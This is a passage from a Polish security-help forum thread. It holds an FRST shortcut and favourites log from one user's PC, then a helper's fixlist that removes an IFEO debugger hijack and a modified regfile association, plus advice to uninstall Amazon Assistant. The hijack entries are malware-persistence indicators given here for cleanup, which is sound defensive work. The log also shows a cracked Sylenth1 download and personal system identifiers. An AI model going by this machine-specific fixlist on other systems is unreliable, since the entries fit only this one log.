ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{471351f0-4e8a-47bf-a6b3-3de3c99ae340}\PlayTasks\0\Jewel Match 3.lnk -> C:\Program Files (x86)\WildGames\Jewel Match 3\JewelMatch3-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{3e271096-cfd0-4d5e-b718-46848370788b}\PlayTasks\0\Home Makeover.lnk -> C:\Program Files (x86)\WildGames\Home Makeover\HomeMakeover-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{366930df-1fad-4379-a989-0dd7f315ad45}\PlayTasks\0\12 Labours of Hercules III Girl Power.lnk -> C:\Program Files (x86)\WildGames\12 Labours of Hercules III Girl Power\12LaboursOfHercules3-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\GameExplorer\{17debf67-d01f-4e9d-9869-a8aa73658458}\PlayTasks\0\Jewel Match Snowscapes.lnk -> C:\Program Files (x86)\WildGames\Jewel Match Snowscapes\JMS-WT.exe (WildTangent, Inc.) -> /launchgc /src gameexplorer
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Default Apps.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPageAppsDefaults
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Devices.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPagePCSystemDevices
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /0
ShortcutWithArgument: C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Default Apps.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPageAppsDefaults
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Devices.lnk -> C:\Windows\ImmersiveControlPanel\systemsettings.exe (Microsoft Corporation) -> page=SettingsPagePCSystemDevices
ShortcutWithArgument: C:\Users\Emil\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - Network Connections.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> ::{7007ACC7-3202-11D1-AAD2-00805FC1270E}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DeviceManager
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\06 - System.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.System
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\08 - Power Options.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.PowerOptions
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group3\10 - Programs and Features.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.ProgramsAndFeatures
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\1 - Run.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\2 - Search.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\3 - Windows Explorer.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{52205fd8-5dfb-447d-801a-d0b52f2e83e1}
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group2\5 - Task Manager.lnk -> C:\Windows\System32\Taskmgr.exe (Microsoft® Windows® Operating System) -> /0
ShortcutWithArgument: C:\Users\Emil\AppData\Local\Microsoft\Windows\WinX\Group1\1 - Desktop.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> shell:::{3080F90D-D7AD-11D9-BD98-0000947B0257}
ShortcutWithArgument: C:\Users\Public\Desktop\Dokumenty Acer.lnk -> C:\OEM\Preload\Autorun\GUI\Acer User's Manual\00\OnePager.exe () -> /folder
ShortcutWithArgument: C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.523\McUICnt.exe (McAfee, Inc.) -> SecurityScanner.dll


InternetURL: C:\Users\Default\Favorites\Booking.com.url -> URL: hxxp://www.booking.com/index.html?aid=379334
InternetURL: C:\Users\Default\Favorites\Acer\Acer.url -> URL: hxxp://www.acer.com/
InternetURL: C:\Users\Emil\Favorites\Bing.url -> URL: hxxp://go.microsoft.com/fwlink/p/?LinkId=255142
InternetURL: C:\Users\Emil\Favorites\Booking.com.url -> URL: hxxp://www.booking.com/index.html?aid=379334
InternetURL: C:\Users\Emil\Favorites\Links\ACER Akcesoria.url -> URL: hxxp://go.acer.com/?id=14173&model=Aspire E5-573G
InternetURL: C:\Users\Emil\Favorites\Acer\Acer.url -> URL: hxxp://www.acer.com/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Bantana Audio Website.url -> URL: hxxp://bantanaaudio.com/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Bantana Powered Production.url -> URL: hxxps://www.facebook.com/groups/BantanaAudio/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Deep House Bedroom Producers.url -> URL: hxxps://www.facebook.com/groups/deephousebedroomproducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Future Bass Producers Group.url -> URL: hxxps://www.facebook.com/groups/FutureBassBedroomProducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Trap and Dubstep Producers Group.url -> URL: hxxps://www.facebook.com/groups/BantanaDubstepProducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Tropical House Producers Group.url -> URL: hxxps://www.facebook.com/groups/tropicalhousebedroomproducers/
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Audio.url -> URL: hxxps://soundcloud.com/bantana
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Mastering.url -> URL: hxxps://soundcloud.com/bantana-mastering
InternetURL: C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets\Patch\130 Preset banks for sylenth1\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana.url -> URL: hxxps://soundcloud.com/bantana_records
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Bantana Audio Website.url -> URL: hxxp://bantanaaudio.com/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Bantana Powered Production.url -> URL: hxxps://www.facebook.com/groups/BantanaAudio/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Deep House Bedroom Producers.url -> URL: hxxps://www.facebook.com/groups/deephousebedroomproducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Future Bass Producers Group.url -> URL: hxxps://www.facebook.com/groups/FutureBassBedroomProducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Trap and Dubstep Producers Group.url -> URL: hxxps://www.facebook.com/groups/BantanaDubstepProducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Join Our Facebook Groups\Tropical House Producers Group.url -> URL: hxxps://www.facebook.com/groups/tropicalhousebedroomproducers/
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Audio.url -> URL: hxxps://soundcloud.com/bantana
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana Mastering.url -> URL: hxxps://soundcloud.com/bantana-mastering
InternetURL: C:\Users\Emil\Desktop\Proje\VST\Bantana Audio KSHMR Style Presets\Follow Us On Soundcloud\Bantana.url -> URL: hxxps://soundcloud.com/bantana_records

==================== Koniec  Shortcut.txt =============================
emillo2502
~user
 
Posty: 15
Dołączenie: 16 Lis 2013, 14:09



Problem z mozilla i zawieszającym się systemem

Postprzez ordynat 24 Kwi 2017, 15:45

Otwórz Notatnik i wklej w nim:
IFEO\DisplaySwitch.exe: [Debugger]
HKU\S-1-5-21-2400838556-3398951076-1685541893-1001\Software\Classes\regfile: regedit.exe "%1" <===== UWAGA
C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 12.lnk

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe
Uruchom FRST i kliknij przycisk Fix (NAPRAW).

=====================================

Co do komunikatu "Nie można wyświetlić strony":
Jeśli nie wyświetla się tylko jedna strona, to po prostu ta strona albo przestała istnieć, albo ma nieważne certyfikaty.
Jeśli natomiast nie wyświetlają się żadne strony, to założysz temat w dziale internet-sieci-vf21.html

Autor postu otrzymał pochwałę
ordynat
~user
 
Posty: 4419
Dołączenie: 02 Kwi 2010, 11:18
Pochwały: 792



Problem z mozilla i zawieszającym się systemem

Postprzez emillo2502 24 Kwi 2017, 22:32

ja używam mozilli a przeglądarka internet explorer sama się włącza właśnie z tym komunikatem :/ klikam na krzyżyk,wyłącza się i zaraz znowu to samo
emillo2502
~user
 
Posty: 15
Dołączenie: 16 Lis 2013, 14:09



Problem z mozilla i zawieszającym się systemem

Postprzez ordynat 25 Kwi 2017, 06:43

w takim razie całkowicie odinstaluj ten program:
Amazon Assistant (HKLM-x32\...\{5437E77B-E4B5-45E7-BD33-95C3F0AA6602}) (Version: 10.17.0228 - Amazon) <==== UWAGA

To z tym programem jest związany aaresources.dll, który jest w adresie strony, która się nie wyświetla.

Autor postu otrzymał pochwałę
ordynat
~user
 
Posty: 4419
Dołączenie: 02 Kwi 2010, 11:18
Pochwały: 792




Powróć do Bezpieczeństwo

Kto jest na forum

Użytkownicy przeglądający to forum: Brak zarejestrowanych użytkowników oraz 2 gości